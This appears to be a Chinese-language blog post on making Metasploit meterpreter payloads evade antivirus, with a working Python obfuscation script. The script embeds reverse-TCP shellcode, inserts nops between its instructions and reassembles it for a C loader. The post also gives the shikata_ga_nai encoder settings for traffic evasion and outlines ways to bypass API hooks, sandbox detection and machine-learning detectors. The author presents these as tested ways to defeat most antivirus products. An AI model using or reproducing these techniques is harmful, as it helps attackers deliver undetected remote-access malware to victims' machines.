meterpreter免杀总结

免杀也就那么几个套路,静态的文件特征码免杀,内存特征码免杀,流量免杀,行为免杀,入口点混淆等等
首先说静态的文件特征码免杀,直接把msf生成的shellcode加密一下就ok了,运行时再解密,随便加一轮异或啥的就ok了,可以用msf自带的编码器也可以自己写
内存特征码免杀,因为我们的meterpreter运行后会解密shellcode,解密后的shellcode有特征,shellcode是地址无关的机器码,所以我们可以插入任何不影响堆栈平衡并且地址无关的nop指令到每两行汇编代码之间,这样简单的绕过内存里的特征码识别,当然还可以进行汇编代码的等效替换,比如add eax,1sub eax,-1是等效的并且代码所占用的字节数是一样的,就可以等效替换,还可以把顺序无关的代码进行上下位置替换,特征码分割法,倒序法等等
其中我试过最简单有效的就是特征码分割法和倒序法,都是字面意思很好理解
我写了一个python脚本来自动插入不影响堆栈平衡的nop指令,代码有点矬,功能确实实现了
这样一来就也不用加密shellcode了,文件特征码和内存特征码都没了,以下python代码的大致逻辑就是把跳转到的目的指令处都加上独一无二的标号,然后把跳转指令改成跳转标号,再编译成二进制代码,这样可以省掉很多修正跳转地址的时间。
运行环境是win10和anaconda64位,有朋友反映在mac上运行有错误。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from capstone import *
from keystone import *

def assemble(code):
try:
ks = Ks(KS_ARCH_X86, KS_MODE_32)
encoding, count = ks.asm(code)
return [hex(i) for i in encoding]
except KsError as e:
print(e)
return -1
def byteoffset2index(offset):
temp=offset
a=0
for i in md.disasm(CODE, 0x0):
temp-=len(i.bytes)
a+=1
if temp==0:
return a
if __name__ == "__main__":
md = Cs(CS_ARCH_X86, CS_MODE_32)
controlflow=["jmp","jz","jnz","je","jne","call","jl","ja","loop","jecxz","jle","jge","jg","jp","jnl"]
registers=["eax","ebx","edx","ebp","esp","edi","esi"]
CODE = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
asm=";".join([i.mnemonic+" "+i.op_str for i in md.disasm(CODE, 0x0)])
asmarray=asm.split(";")
length=len(asmarray)
tags=[]
for i in range(0,len(asmarray)):
for mnemonic in controlflow:
if (mnemonic in asmarray[i]):
tags.append(i)
mask=[]
for i in range(0,len(tags)):
for reg in registers:
if (reg in asmarray[tags[i]]):
mask.append(tags[i])
[tags.remove(i) for i in mask]
tagins=[asmarray[i] for i in tags]
revision=[]
for i in range(0,len(tagins)):
b=tagins[i][tagins[i].index("0x"):]
n=byteoffset2index(int(b,16))
revision.append(n)
revision_unique=list(set(revision))
for i in range(0,len(revision_unique)):
asmarray[revision_unique[i]]="a"+str(revision_unique[i])+": "+asmarray[revision_unique[i]]
tagins=[asmarray[i] for i in tags]
for i in range(0,len(tags)):
asmarray[tags[i]]=tagins[i][:tagins[i].index("0x")]+"a"+str(revision[i])
obfuscation="nop"
code=obfuscation+";"+(";"+obfuscation+";").join(asmarray)
print("unsigned char buf[]="+str(assemble(code)).replace("\'","").replace("[","{").replace("]","}")+";")

然后用c写个shellcode加载器运行就行了,这样就可以干掉国内大部分杀软
汇编和特征码层面的免杀还可以改编译器的配置,比如你修改工程属性里的优化等选项可以大幅度的更改源代码对应的汇编代码,从而抹掉一些特征码
这个插花脚本再加上引入一些无关逻辑后效果如下

最后的工程文件就不贴出来了
流量免杀的话就可以直接拿来用了

1
2
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai

用编码器就ok了,目前国内用户用的多的的杀软里面目测只有windows defender进行了流量扫描,测试这个编码可以绕过,其他的编码等级都太低,编码成功率太低,只有这个shikata_ga_nai的rank是excellent

行为免杀的话只是想过还没实践过,行为查杀是杀软通过hook一些api,hook各种东西来获取堆栈参数啥的进行分析的。比如说他hook了WriteFile,来获取堆栈参数来检测我们是不是在启动文件夹里写入文件,我们就可以参考reactos里WriteFile的实现,重新写一个MyWriteFile函数

然后还有绕过沙箱分析,我们可以用行为免杀同样的方法,也可以从沙箱本身出发,不硬碰硬,我们只需要检测是否是沙箱就行了,如果是沙箱的话可以不进入执行shellcode的逻辑,但是我猜测这里面还有分支遍历的手段来检测我们的被控端,怎么对抗分支遍历,我们可以动态生成跳转到shellcode的代码,这样他就预测不到我们的分支控制流转移到哪里了。

还有就是一些智障AI杀软,我们可以通过引入大量病毒不常用的API函数和功能逻辑来绕过,来误导其模型。

持续更新,继续踩坑